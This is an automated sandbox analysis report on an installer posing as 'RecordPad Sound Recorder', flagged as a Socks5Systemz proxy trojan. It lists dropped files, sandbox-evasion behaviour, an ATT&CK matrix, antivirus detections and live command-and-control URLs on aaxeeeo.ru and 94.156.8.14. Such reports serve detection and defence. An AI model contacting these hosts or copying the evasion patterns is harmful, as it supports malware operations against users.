                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-K3HBS.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-KU10K.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp140.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-KI2RB.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-8ECK7.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-VDBC5.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-EAHN0.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp140_1.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_iscrypt.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-JNDNQ.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5Svg.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\mousehelper.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\QtAVWidgets1.dll (copy)Jump to dropped file
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-6440
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-3206
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe TID: 2788Thread sleep count: 131 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe TID: 2788Thread sleep time: -262000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe TID: 760Thread sleep count: 42 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe TID: 760Thread sleep time: -2520000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe TID: 2788Thread sleep count: 9765 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe TID: 2788Thread sleep time: -19530000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0047A964 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_0047A964
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00470C84 FindFirstFileA,FindNextFileA,FindClose,1_2_00470C84
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00451668 FindFirstFileA,GetLastError,1_2_00451668
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00460594 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00460594
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00492760 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00492760
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0047884C FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_0047884C
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00460A10 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00460A10
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0045F008 FindFirstFileA,FindNextFileA,FindClose,1_2_0045F008
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: 0_2_00409A14 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409A14
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeThread delayed: delay time: 60000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\userJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\user\AppDataJump to behavior
                      Source: tOniaJ21lj.tmp, 00000001.00000002.3269392528.0000000000669000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: recordpadsoundrecorder32.exe, 00000004.00000002.3270365274.0000000003310000.00000004.00000020.00020000.00000000.sdmp, recordpadsoundrecorder32.exe, 00000004.00000002.3269409364.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeAPI call chain: ExitProcess graph end nodegraph_0-6298
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeAPI call chain: ExitProcess graph end nodegraph_3-3468
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_0262016E RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,4_2_0262016E
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_0262016E RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,4_2_0262016E
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00447F60 LoadLibraryExA,LoadLibraryA,GetProcAddress,1_2_00447F60
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_02606487 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,4_2_02606487
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_026194D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_026194D8
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_004739C4 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_004739C4
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0045B29C GetVersion,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,AllocateAndInitializeSid,GetLastError,LocalFree,1_2_0045B29C
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_0260F809 cpuid 4_2_0260F809
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: GetLocaleInfoA,0_2_0040515C
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: GetLocaleInfoA,0_2_004051A8
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: GetLocaleInfoA,1_2_004084D0
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: GetLocaleInfoA,1_2_0040851C
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00456D8C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_00456D8C
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00453F88 GetUserNameA,1_2_00453F88
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: 0_2_00405C44 GetVersionExA,0_2_00405C44

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Socks5Systemz
                      Source: Yara matchFile source: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3269669582.000000000097E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: recordpadsoundrecorder32.exe PID: 1412, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Socks5Systemz
                      Source: Yara matchFile source: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3269669582.000000000097E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: recordpadsoundrecorder32.exe PID: 1412, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                      Native API                      		1
                      DLL Side-Loading                      		1
                      Exploitation for Privilege Escalation                      		1
                      Deobfuscate/Decode Files or Information                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		2
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts2
                      Service Execution                      		4
                      Windows Service                      		1
                      DLL Side-Loading                      		3
                      Obfuscated Files or Information                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop ProtocolData from Removable Media2
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Bootkit                      		1
                      Access Token Manipulation                      		22
                      Software Packing                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook4
                      Windows Service                      		1
                      DLL Side-Loading                      		NTDS35
                      System Information Discovery                      		Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                      Process Injection                      		1
                      Masquerading                      		LSA Secrets141
                      Security Software Discovery                      		SSHKeylogging112
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials21
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Access Token Manipulation                      		DCSync11
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                      Process Injection                      		Proc Filesystem3
                      System Owner/User Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Bootkit                      		/etc/passwd and /etc/shadow1
                      Remote System Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                      System Network Configuration Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      tOniaJ21lj.exe21%ReversingLabsWin32.Trojan.Privateloader
                      tOniaJ21lj.exe100%AviraHEUR/AGEN.1332570

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmp100%AviraADWARE/AVI.ICLoader.jwrbl
                      C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exe100%AviraHEUR/AGEN.1314993
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmp100%Joe Sandbox ML
                      C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exe100%Joe Sandbox ML
                      C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exe42%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5OpenGL.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5Svg.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5WinExtras.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5Xml.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\QtAVWidgets1.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\avdevice-58.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-0C056.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-6P98M.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-8ECK7.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-C4R5U.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-EAHN0.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-FR4FM.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-JNDNQ.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-K3HBS.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-KI2RB.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-KU10K.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-O2PKH.tmp3%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-PRP4U.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-RV2D1.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmp88%ReversingLabsWin32.PUA.IcLoader
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UTKLG.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-VDBC5.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\libcurl.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\libeay32.dll (copy)88%ReversingLabsWin32.PUA.IcLoader
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\libmp3lame.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\mousehelper.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp120.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp140.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp140_1.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcr120.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\openh264.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe42%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\unins000.exe (copy)3%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp3%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_RegDLL.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_setup64.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_shfoldr.dll0%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://sectigo.com/CPS00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.thawte.com00%URL Reputationsafe
                      http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltech0%Avira URL Cloudsafe
                      http://lame.sf.net32bits64bits0%Avira URL Cloudsafe
                      http://qt-project.org/xml/features/report-whitespace-only-CharData0%Avira URL Cloudsafe
                      http://ocsps.ssl.com0?0%Avira URL Cloudsafe
                      aaxeeeo.ru0%Avira URL Cloudsafe
                      http://www.innosetup.com/0%Avira URL Cloudsafe
                      http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer00%Avira URL Cloudsafe
                      http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt00%Avira URL Cloudsafe
                      http://xml.org/sax/features/namespaces0%Avira URL Cloudsafe
                      http://aaxeeeo.ru/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ff710c2e8929d3d0%Avira URL Cloudsafe
                      http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q0%Avira URL Cloudsafe
                      http://94.156.8.14/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d0%Avira URL Cloudsafe
                      http://xml.org/sax/features/namespace-prefixes0%Avira URL Cloudsafe
                      http://ocsps.ssl.com00%Avira URL Cloudsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%Avira URL Cloudsafe
                      http://lame.sf.netB0%Avira URL Cloudsafe
                      http://qtav.org20%Avira URL Cloudsafe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%Avira URL Cloudsafe
                      https://curl.haxx.se/docs/http-cookies.html0%Avira URL Cloudsafe
                      http://94.156.8.14/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f80%Avira URL Cloudsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%Avira URL Cloudsafe
                      http://www.remobjects.com/psU0%Avira URL Cloudsafe
                      http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl00%Avira URL Cloudsafe
                      http://lame.sf.net0%Avira URL Cloudsafe
                      http://crls.ssl.com/ssl.com-rsa-RootCA.crl00%Avira URL Cloudsafe
                      http://crl.thawte.com/ThawteTimestampingCA.crl00%Avira URL Cloudsafe
                      https://www.thawte.com/cps0/0%Avira URL Cloudsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%Avira URL Cloudsafe
                      https://www.thawte.com/repository0W0%Avira URL Cloudsafe
                      http://qt-project.org/xml/features/report-start-end-entity0%Avira URL Cloudsafe
                      https://curl.haxx.se/docs/copyright.htmlD0%Avira URL Cloudsafe
                      http://aaxeeeo.ru/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca6891100%Avira URL Cloudsafe
                      https://www.ssl.com/repository00%Avira URL Cloudsafe
                      https://curl.haxx.se/V0%Avira URL Cloudsafe
                      http://trolltech.com/xml/features/report-start-end-entity0%Avira URL Cloudsafe
                      http://www.mpegla.com0%Avira URL Cloudsafe
                      http://www.remobjects.com/ps0%Avira URL Cloudsafe
                      http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl00%Avira URL Cloudsafe
                      http://trolltech.com/xml/features/report-whitespace-only-CharData0%Avira URL Cloudsafe
                      http://ocsps.ssl.com0Q0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      aaxeeeo.ru
                      		94.156.8.14
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://aaxeeeo.ru/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ff710c2e8929d3dtrue
                        • Avira URL Cloud: safe
                        		unknown
                        aaxeeeo.rutrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://aaxeeeo.ru/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110true
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.innosetup.com/tOniaJ21lj.tmp, tOniaJ21lj.tmp, 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, tOniaJ21lj.tmp.0.dr, is-O2PKH.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0is-UCHQL.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://sectigo.com/CPS0is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://ocsp.sectigo.com0is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://lame.sf.net32bits64bitsis-VDBC5.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsp.thawte.com0is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://qt-project.org/xml/features/report-whitespace-only-CharDatais-KI2RB.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://xml.org/sax/features/namespacesis-KI2RB.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsps.ssl.com0?is-UCHQL.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0is-UCHQL.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltechis-KI2RB.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://94.156.8.14/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14drecordpadsoundrecorder32.exe, 00000004.00000002.3269409364.000000000095F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Qis-UCHQL.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://lame.sf.netBis-VDBC5.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsps.ssl.com0is-UCHQL.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
